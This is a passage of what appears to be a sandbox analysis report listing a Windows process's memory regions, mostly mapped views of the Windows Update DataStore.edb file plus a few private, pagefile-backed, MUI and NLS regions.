	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 996
	        start_va = 0x16572370000
	          end_va = 0x1657237ffff
	     entry_point = 0x16572370000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 997
	        start_va = 0x16572380000
	          end_va = 0x1657238ffff
	     entry_point = 0x16572380000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 998
	        start_va = 0x16572390000
	          end_va = 0x1657239ffff
	     entry_point = 0x16572390000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 999
	        start_va = 0x165723a0000
	          end_va = 0x165723affff
	     entry_point = 0x165723a0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1000
	        start_va = 0x165723b0000
	          end_va = 0x165723bffff
	     entry_point = 0x165723b0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1001
	        start_va = 0x165723c0000
	          end_va = 0x165723cffff
	     entry_point = 0x165723c0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1002
	        start_va = 0x165723d0000
	          end_va = 0x165723dffff
	     entry_point = 0x165723d0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1003
	        start_va = 0x165723e0000
	          end_va = 0x165723effff
	     entry_point = 0x165723e0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1004
	        start_va = 0x165723f0000
	          end_va = 0x165723fffff
	     entry_point = 0x165723f0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1005
	        start_va = 0x16572400000
	          end_va = 0x1657240ffff
	     entry_point = 0x16572400000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1006
	        start_va = 0x16572410000
	          end_va = 0x1657241ffff
	     entry_point = 0x16572410000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1007
	        start_va = 0x16572420000
	          end_va = 0x1657242ffff
	     entry_point = 0x16572420000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1008
	        start_va = 0x16572430000
	          end_va = 0x1657243ffff
	     entry_point = 0x16572430000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1009
	        start_va = 0x16572440000
	          end_va = 0x1657244ffff
	     entry_point = 0x16572440000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1010
	        start_va = 0x16572450000
	          end_va = 0x1657245ffff
	     entry_point = 0x16572450000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1011
	        start_va = 0x16572460000
	          end_va = 0x1657246ffff
	     entry_point = 0x16572460000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1012
	        start_va = 0x16572470000
	          end_va = 0x1657247ffff
	     entry_point = 0x16572470000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1013
	        start_va = 0x16572480000
	          end_va = 0x1657248ffff
	     entry_point = 0x16572480000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1014
	        start_va = 0x16572490000
	          end_va = 0x1657249ffff
	     entry_point = 0x16572490000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1015
	        start_va = 0x165724a0000
	          end_va = 0x165724affff
	     entry_point = 0x165724a0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1016
	        start_va = 0x165724b0000
	          end_va = 0x165724bffff
	     entry_point = 0x165724b0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1017
	        start_va = 0x165724c0000
	          end_va = 0x165724cffff
	     entry_point = 0x165724c0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1018
	        start_va = 0x165724d0000
	          end_va = 0x165724dffff
	     entry_point = 0x165724d0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1019
	        start_va = 0x165724e0000
	          end_va = 0x165724effff
	     entry_point = 0x165724e0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1020
	        start_va = 0x165724f0000
	          end_va = 0x165724fffff
	     entry_point = 0x165724f0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1021
	        start_va = 0x16572500000
	          end_va = 0x1657250ffff
	     entry_point = 0x16572500000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1022
	        start_va = 0x16572510000
	          end_va = 0x1657251ffff
	     entry_point = 0x16572510000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1023
	        start_va = 0x16572520000
	          end_va = 0x1657252ffff
	     entry_point = 0x16572520000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1024
	        start_va = 0x16572530000
	          end_va = 0x1657253ffff
	     entry_point = 0x16572530000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1025
	        start_va = 0x16572540000
	          end_va = 0x1657254ffff
	     entry_point = 0x16572540000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1026
	        start_va = 0x16572550000
	          end_va = 0x1657255ffff
	     entry_point = 0x16572550000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1027
	        start_va = 0x16572560000
	          end_va = 0x1657256ffff
	     entry_point = 0x16572560000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1028
	        start_va = 0x16572570000
	          end_va = 0x1657257ffff
	     entry_point = 0x16572570000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1029
	        start_va = 0x16572580000
	          end_va = 0x1657258ffff
	     entry_point = 0x16572580000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1030
	        start_va = 0x16572590000
	          end_va = 0x1657259ffff
	     entry_point = 0x16572590000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1031
	        start_va = 0x165725a0000
	          end_va = 0x165725affff
	     entry_point = 0x165725a0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1032
	        start_va = 0x165725b0000
	          end_va = 0x165725bffff
	     entry_point = 0x165725b0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1033
	        start_va = 0x165725c0000
	          end_va = 0x165725cffff
	     entry_point = 0x165725c0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1034
	        start_va = 0x165725d0000
	          end_va = 0x165725dffff
	     entry_point = 0x165725d0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1035
	        start_va = 0x165725e0000
	          end_va = 0x165725effff
	     entry_point = 0x165725e0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1036
	        start_va = 0x165725f0000
	          end_va = 0x165725fffff
	     entry_point = 0x165725f0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1037
	        start_va = 0x16572600000
	          end_va = 0x1657260ffff
	     entry_point = 0x16572600000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1038
	        start_va = 0x16572610000
	          end_va = 0x1657261ffff
	     entry_point = 0x16572610000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1039
	        start_va = 0x16572620000
	          end_va = 0x1657262ffff
	     entry_point = 0x16572620000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1040
	        start_va = 0x16572630000
	          end_va = 0x1657263ffff
	     entry_point = 0x16572630000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1041
	        start_va = 0x16572640000
	          end_va = 0x1657264ffff
	     entry_point = 0x16572640000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1042
	        start_va = 0x16572650000
	          end_va = 0x1657265ffff
	     entry_point = 0x16572650000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1043
	        start_va = 0x16572660000
	          end_va = 0x1657266ffff
	     entry_point = 0x16572660000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1044
	        start_va = 0x16572670000
	          end_va = 0x1657267ffff
	     entry_point = 0x16572670000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1045
	        start_va = 0x16572680000
	          end_va = 0x1657268ffff
	     entry_point = 0x16572680000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1046
	        start_va = 0x16572690000
	          end_va = 0x1657269ffff
	     entry_point = 0x16572690000
	     region_type = mapped_file
	            name = "winnlsres.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui")

Region:
	              id = 1047
	        start_va = 0x165726a0000
	          end_va = 0x165726affff
	     entry_point = 0x165726a0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1048
	        start_va = 0x165726b0000
	          end_va = 0x165726bffff
	     entry_point = 0x165726b0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1049
	        start_va = 0x165726c0000
	          end_va = 0x165726cffff
	     entry_point = 0x165726c0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1050
	        start_va = 0x165726d0000
	          end_va = 0x165726dffff
	     entry_point = 0x165726d0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1051
	        start_va = 0x165726e0000
	          end_va = 0x165726effff
	     entry_point = 0x165726e0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1052
	        start_va = 0x165726f0000
	          end_va = 0x165726fffff
	     entry_point = 0x165726f0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1053
	        start_va = 0x16572700000
	          end_va = 0x165727fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016572700000"
	        filename = ""

Region:
	              id = 1054
	        start_va = 0x16572800000
	          end_va = 0x1657280ffff
	     entry_point = 0x16572800000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1055
	        start_va = 0x16572810000
	          end_va = 0x1657281ffff
	     entry_point = 0x16572810000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1056
	        start_va = 0x16572820000
	          end_va = 0x1657282ffff
	     entry_point = 0x16572820000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1057
	        start_va = 0x16572830000
	          end_va = 0x1657283ffff
	     entry_point = 0x16572830000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1058
	        start_va = 0x16572840000
	          end_va = 0x1657284ffff
	     entry_point = 0x16572840000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1059
	        start_va = 0x16572850000
	          end_va = 0x1657285ffff
	     entry_point = 0x16572850000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1060
	        start_va = 0x16572860000
	          end_va = 0x1657286ffff
	     entry_point = 0x16572860000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1061
	        start_va = 0x16572870000
	          end_va = 0x1657287ffff
	     entry_point = 0x16572870000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1062
	        start_va = 0x16572880000
	          end_va = 0x1657288ffff
	     entry_point = 0x16572880000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1063
	        start_va = 0x16572890000
	          end_va = 0x1657289ffff
	     entry_point = 0x16572890000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1064
	        start_va = 0x165728a0000
	          end_va = 0x165728affff
	     entry_point = 0x165728a0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1065
	        start_va = 0x165728b0000
	          end_va = 0x165728bffff
	     entry_point = 0x165728b0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1066
	        start_va = 0x165728c0000
	          end_va = 0x165728cffff
	     entry_point = 0x165728c0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1067
	        start_va = 0x165728d0000
	          end_va = 0x165728dffff
	     entry_point = 0x165728d0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1068
	        start_va = 0x165728e0000
	          end_va = 0x165728effff
	     entry_point = 0x165728e0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1069
	        start_va = 0x165728f0000
	          end_va = 0x165728fffff
	     entry_point = 0x165728f0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1070
	        start_va = 0x16572900000
	          end_va = 0x16572906fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016572900000"
	        filename = ""

Region:
	              id = 1071
	        start_va = 0x16572910000
	          end_va = 0x1657291ffff
	     entry_point = 0x16572910000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1072
	        start_va = 0x16572920000
	          end_va = 0x1657292ffff
	     entry_point = 0x16572920000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1073
	        start_va = 0x16572930000
	          end_va = 0x1657293ffff
	     entry_point = 0x16572930000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1074
	        start_va = 0x16572940000
	          end_va = 0x1657294ffff
	     entry_point = 0x16572940000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1075
	        start_va = 0x16572950000
	          end_va = 0x1657295ffff
	     entry_point = 0x16572950000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1076
	        start_va = 0x16572960000
	          end_va = 0x1657296ffff
	     entry_point = 0x16572960000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1077
	        start_va = 0x16572970000
	          end_va = 0x1657297ffff
	     entry_point = 0x16572970000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1078
	        start_va = 0x16572980000
	          end_va = 0x1657298ffff
	     entry_point = 0x16572980000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1079
	        start_va = 0x16572990000
	          end_va = 0x16572996fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016572990000"
	        filename = ""

Region:
	              id = 1080
	        start_va = 0x165729a0000
	          end_va = 0x165729affff
	     entry_point = 0x165729a0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1081
	        start_va = 0x165729b0000
	          end_va = 0x165729bffff
	     entry_point = 0x165729b0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 1082
	        start_va = 0x165729c0000
	          end_va = 0x165729c1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000165729c0000"
	        filename = ""

Region:
	              id = 1083
	        start_va = 0x165729d0000
	          end_va = 0x165729d0fff
	     entry_point = 0x165729d0000
	     region_type = mapped_file
	            name = "usocore.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui")

Region:
	              id = 1084
	        start_va = 0x165729e0000
	          end_va = 0x165729e1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000165729e0000"
	        filename = ""

Region:
	              id = 1085
	        start_va = 0x165729f0000
	          end_va = 0x165729f0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000165729f0000"
	        filename = ""

Region:
	              id = 1086
	        start_va = 0x16572a00000
	          end_va = 0x16572afffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016572a00000"
	        filename = ""

Region:
	              id = 1087
	        start_va = 0x16572b00000
	          end_va = 0x16572b17fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016572b00000"
	        filename = ""

Region:
	              id = 1088
	        start_va = 0x16572b30000
	          end_va = 0x16572b30fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016572b30000"
	        filename = ""

Region:
	              id = 1089
	        start_va = 0x16572b40000
	          end_va = 0x16572b40fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000016572b40000"
	        filename = ""

Region:
	              id = 1090
	        start_va = 0x16572b50000
	          end_va = 0x16572b60fff
	     entry_point = 0x16572b50000
	     region_type = mapped_file
	            name = "c_1256.nls"
	        filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls")

Region:
	              id = 1091
	        start_va = 0x16572b70000
	          end_va = 0x16572b80fff
	     entry_point = 0x16572b70000
	     region_type = mapped_file
	            name = "c_1251.nls"
	        filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls")

Region:
	              id = 1092
	        start_va = 0x16572b90000
	          end_va = 0x16572ba0fff
	     entry_point = 0x16572b90000
	     region_type = mapped_file
	            name = "c_1254.nls"
	        filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls")

Region:
	              id = 1093
	        start_va = 0x16572bb0000
	          end_va = 0x16572bc0fff
	     entry_point = 0x16572bb0000
	     region_type = mapped_file
	            name = "c_1250.nls"
	        filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls")

Region:
	              id = 1094
	        start_va = 0x16572bd0000
	          end_va = 0x16572be0fff
	     entry_point = 0x16572bd0000
	     region_type = mapped_file
	            name = "c_1253.nls"
	        filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls")

Region:
	              id = 1095
	        start_va = 0x16572c00000
	          end_va = 0x16572cfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016572c00000"
	        filename = ""

Region:
	              id = 1096
	        start_va = 0x16572d00000
	          end_va = 0x16572d10fff
	     entry_point = 0x16572d00000
	     region_type = mapped_file
	            name = "c_1257.nls"
